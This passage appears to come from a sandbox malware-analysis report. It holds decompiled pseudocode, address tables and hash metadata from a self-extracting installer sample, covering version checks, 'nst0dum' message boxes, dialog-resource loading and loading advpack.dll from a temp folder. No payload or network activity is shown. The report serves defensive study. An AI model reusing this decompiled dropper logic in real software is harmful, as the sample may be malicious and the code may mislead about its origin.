                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x398a38 & 0x00000001;
                                                                                                                                                                                                    											if(( *0x398a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                    												_push("nst0dum");
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                    												_t94 = E0039681F(_t115);
                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "nst0dum", 0x00180030 | _t115);
                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t98 = E003967C9(_t124, _t124);
                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                    									_t104 = E003928E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                    						 *0x399a40 = _t119;
                                                                                                                                                                                                    						 *0x398184 = 1;
                                                                                                                                                                                                    						 *0x398180 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                    						 *0x399a40 = 1;
                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x398184 = _t135;
                                                                                                                                                                                                    							 *0x398180 = _t135;
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t138 = 0x4ca;
                                                                                                                                                                                                    					goto L44;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t138 = 0x4b4;
                                                                                                                                                                                                    					L44:
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					_push(_t135);
                                                                                                                                                                                                    					L65:
                                                                                                                                                                                                    					_t133 = _t138;
                                                                                                                                                                                                    					E003944B9(0, _t138);
                                                                                                                                                                                                    					L66:
                                                                                                                                                                                                    					return E00396CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x003936f9
                                                                                                                                                                                                    0x00393700
                                                                                                                                                                                                    0x0039370c
                                                                                                                                                                                                    0x00393716
                                                                                                                                                                                                    0x00393718
                                                                                                                                                                                                    0x0039371b
                                                                                                                                                                                                    0x00393721
                                                                                                                                                                                                    0x0039372b
                                                                                                                                                                                                    0x0039373d
                                                                                                                                                                                                    0x00393745
                                                                                                                                                                                                    0x00393746
                                                                                                                                                                                                    0x00393746
                                                                                                                                                                                                    0x00393749
                                                                                                                                                                                                    0x003937ab
                                                                                                                                                                                                    0x003937ad
                                                                                                                                                                                                    0x003937ae
                                                                                                                                                                                                    0x003937b3
                                                                                                                                                                                                    0x003937b8
                                                                                                                                                                                                    0x003937b8
                                                                                                                                                                                                    0x003937bf
                                                                                                                                                                                                    0x003937bf
                                                                                                                                                                                                    0x003937c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937cb
                                                                                                                                                                                                    0x003937cd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937d5
                                                                                                                                                                                                    0x003937db
                                                                                                                                                                                                    0x003937e8
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937ea
                                                                                                                                                                                                    0x003937f0
                                                                                                                                                                                                    0x003937f6
                                                                                                                                                                                                    0x00393805
                                                                                                                                                                                                    0x00393817
                                                                                                                                                                                                    0x0039382b
                                                                                                                                                                                                    0x00393830
                                                                                                                                                                                                    0x00393836
                                                                                                                                                                                                    0x0039383b
                                                                                                                                                                                                    0x0039383d
                                                                                                                                                                                                    0x003938eb
                                                                                                                                                                                                    0x003938eb
                                                                                                                                                                                                    0x003938f2
                                                                                                                                                                                                    0x0039390c
                                                                                                                                                                                                    0x00393911
                                                                                                                                                                                                    0x00393911
                                                                                                                                                                                                    0x00393913
                                                                                                                                                                                                    0x0039394d
                                                                                                                                                                                                    0x0039394d
                                                                                                                                                                                                    0x0039394f
                                                                                                                                                                                                    0x003938a9
                                                                                                                                                                                                    0x003938a9
                                                                                                                                                                                                    0x003938b0
                                                                                                                                                                                                    0x003938b2
                                                                                                                                                                                                    0x003938b9
                                                                                                                                                                                                    0x003938bb
                                                                                                                                                                                                    0x003938c1
                                                                                                                                                                                                    0x00393975
                                                                                                                                                                                                    0x003938c7
                                                                                                                                                                                                    0x003938de
                                                                                                                                                                                                    0x003938e0
                                                                                                                                                                                                    0x003938e0
                                                                                                                                                                                                    0x0039397b
                                                                                                                                                                                                    0x0039397d
                                                                                                                                                                                                    0x003939a9
                                                                                                                                                                                                    0x0039397f
                                                                                                                                                                                                    0x00393982
                                                                                                                                                                                                    0x0039398b
                                                                                                                                                                                                    0x0039398d
                                                                                                                                                                                                    0x0039398f
                                                                                                                                                                                                    0x0039399f
                                                                                                                                                                                                    0x003939a1
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x00393991
                                                                                                                                                                                                    0x0039398f
                                                                                                                                                                                                    0x003939af
                                                                                                                                                                                                    0x003939b6
                                                                                                                                                                                                    0x00393a0f
                                                                                                                                                                                                    0x00393a0f
                                                                                                                                                                                                    0x00393a11
                                                                                                                                                                                                    0x00393a13
                                                                                                                                                                                                    0x00393a19
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939b8
                                                                                                                                                                                                    0x003939b8
                                                                                                                                                                                                    0x003939ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939bc
                                                                                                                                                                                                    0x003939bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939c3
                                                                                                                                                                                                    0x003939c9
                                                                                                                                                                                                    0x003939ce
                                                                                                                                                                                                    0x003939d0
                                                                                                                                                                                                    0x003939e3
                                                                                                                                                                                                    0x003939e5
                                                                                                                                                                                                    0x003939e6
                                                                                                                                                                                                    0x003939f1
                                                                                                                                                                                                    0x003939f7
                                                                                                                                                                                                    0x003939fa
                                                                                                                                                                                                    0x00393a01
                                                                                                                                                                                                    0x00393a04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393a06
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x00393a0b
                                                                                                                                                                                                    0x00393a0b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393a09
                                                                                                                                                                                                    0x003939fc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939fc
                                                                                                                                                                                                    0x003939d3
                                                                                                                                                                                                    0x003939d8
                                                                                                                                                                                                    0x003939da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003939dc
                                                                                                                                                                                                    0x003939b6
                                                                                                                                                                                                    0x00393955
                                                                                                                                                                                                    0x0039395b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393961
                                                                                                                                                                                                    0x00393963
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393969
                                                                                                                                                                                                    0x00393915
                                                                                                                                                                                                    0x00393915
                                                                                                                                                                                                    0x0039391b
                                                                                                                                                                                                    0x0039391f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039392d
                                                                                                                                                                                                    0x00393933
                                                                                                                                                                                                    0x00393938
                                                                                                                                                                                                    0x0039393a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393940
                                                                                                                                                                                                    0x00393946
                                                                                                                                                                                                    0x0039394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039394b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003938f2
                                                                                                                                                                                                    0x00393843
                                                                                                                                                                                                    0x00393845
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039384b
                                                                                                                                                                                                    0x0039384d
                                                                                                                                                                                                    0x00393883
                                                                                                                                                                                                    0x00393885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039389a
                                                                                                                                                                                                    0x0039389e
                                                                                                                                                                                                    0x0039389e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003938a0
                                                                                                                                                                                                    0x003938a0
                                                                                                                                                                                                    0x003938a2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003938a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003938a4
                                                                                                                                                                                                    0x0039384f
                                                                                                                                                                                                    0x00393851
                                                                                                                                                                                                    0x00393857
                                                                                                                                                                                                    0x0039386e
                                                                                                                                                                                                    0x00393877
                                                                                                                                                                                                    0x0039387b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393881
                                                                                                                                                                                                    0x00393859
                                                                                                                                                                                                    0x0039385c
                                                                                                                                                                                                    0x00393862
                                                                                                                                                                                                    0x00393866
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393868
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003938f4
                                                                                                                                                                                                    0x003938f4
                                                                                                                                                                                                    0x003938f5
                                                                                                                                                                                                    0x003938fb
                                                                                                                                                                                                    0x00393901
                                                                                                                                                                                                    0x00393901
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039390a
                                                                                                                                                                                                    0x0039374b
                                                                                                                                                                                                    0x0039374e
                                                                                                                                                                                                    0x0039375c
                                                                                                                                                                                                    0x00393764
                                                                                                                                                                                                    0x00393769
                                                                                                                                                                                                    0x0039376e
                                                                                                                                                                                                    0x00393771
                                                                                                                                                                                                    0x0039379c
                                                                                                                                                                                                    0x0039379f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937a3
                                                                                                                                                                                                    0x003937a4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003937a4
                                                                                                                                                                                                    0x00393773
                                                                                                                                                                                                    0x00393777
                                                                                                                                                                                                    0x00393778
                                                                                                                                                                                                    0x0039377f
                                                                                                                                                                                                    0x00393781
                                                                                                                                                                                                    0x0039378e
                                                                                                                                                                                                    0x0039378e
                                                                                                                                                                                                    0x00393794
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393794
                                                                                                                                                                                                    0x00393783
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393785
                                                                                                                                                                                                    0x0039378c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039378c
                                                                                                                                                                                                    0x00393750
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039372d
                                                                                                                                                                                                    0x0039372d
                                                                                                                                                                                                    0x0039396b
                                                                                                                                                                                                    0x0039396b
                                                                                                                                                                                                    0x0039396c
                                                                                                                                                                                                    0x0039396e
                                                                                                                                                                                                    0x0039396f
                                                                                                                                                                                                    0x00393a1e
                                                                                                                                                                                                    0x00393a1e
                                                                                                                                                                                                    0x00393a22
                                                                                                                                                                                                    0x00393a27
                                                                                                                                                                                                    0x00393a3e
                                                                                                                                                                                                    0x00393a3e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00393723
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 003939C3
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 003939F1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                    • String ID: 3$nst0dum
                                                                                                                                                                                                    • API String ID: 2519184315-140149190
                                                                                                                                                                                                    • Opcode ID: 74d8c64b67f7f086a5edb55b0526da71d39946214e0db70ab4c1e0945c46d507
                                                                                                                                                                                                    • Instruction ID: 96bb0bd1a98290593c8ea6a6602743079a45c5e9c8fac984c0e6e97f01f8025f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74d8c64b67f7f086a5edb55b0526da71d39946214e0db70ab4c1e0945c46d507
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5191D2F1E052249BEF378B15CC81BEA77B5EB85304F1601AAD88ADB251DB718F81CB41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                    			E00396517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                    				struct HRSRC__* _t6;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t23 =  *0x399a3c; // 0x390000
                                                                                                                                                                                                    				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					E003944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t5 =  &_a16; // 0x392ee8
                                                                                                                                                                                                    					_t24 =  *_t5;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                    						FreeResource(_t21);
                                                                                                                                                                                                    						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x0039651f
                                                                                                                                                                                                    0x0039652a
                                                                                                                                                                                                    0x00396534
                                                                                                                                                                                                    0x0039656b
                                                                                                                                                                                                    0x00396577
                                                                                                                                                                                                    0x0039657c
                                                                                                                                                                                                    0x0039657c
                                                                                                                                                                                                    0x00396536
                                                                                                                                                                                                    0x0039653e
                                                                                                                                                                                                    0x00396542
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396544
                                                                                                                                                                                                    0x00396547
                                                                                                                                                                                                    0x0039654c
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x0039655e
                                                                                                                                                                                                    0x00396560
                                                                                                                                                                                                    0x00396569
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396569
                                                                                                                                                                                                    0x00396542
                                                                                                                                                                                                    0x00396587

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                    • LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                    • String ID: .9
                                                                                                                                                                                                    • API String ID: 1214682469-2956137912
                                                                                                                                                                                                    • Opcode ID: 892839fc15fbc64bd582d138dc823e7aa855c74c77c35e564a7b123f76ae693d
                                                                                                                                                                                                    • Instruction ID: 3044c7a9efac419497f9a1694b33c26200ffcc7d6da27d5fda7b742d10446657
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892839fc15fbc64bd582d138dc823e7aa855c74c77c35e564a7b123f76ae693d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601F972101A15BBDF126F6A9C49DBB7A6CEB8A761F02022AFE1093154D772CD10C6E1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E00396495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed char _t14;
                                                                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				CHAR* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				E00391781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    				_t26 = "advpack.dll";
                                                                                                                                                                                                    				E0039658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                    				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                    					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00396495
                                                                                                                                                                                                    0x00396495
                                                                                                                                                                                                    0x003964a0
                                                                                                                                                                                                    0x003964a7
                                                                                                                                                                                                    0x003964ab
                                                                                                                                                                                                    0x003964bd
                                                                                                                                                                                                    0x003964c2
                                                                                                                                                                                                    0x003964d3
                                                                                                                                                                                                    0x003964df
                                                                                                                                                                                                    0x003964e8
                                                                                                                                                                                                    0x00396502
                                                                                                                                                                                                    0x003964ee
                                                                                                                                                                                                    0x003964f9
                                                                                                                                                                                                    0x003964f9
                                                                                                                                                                                                    0x00396516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003964DF
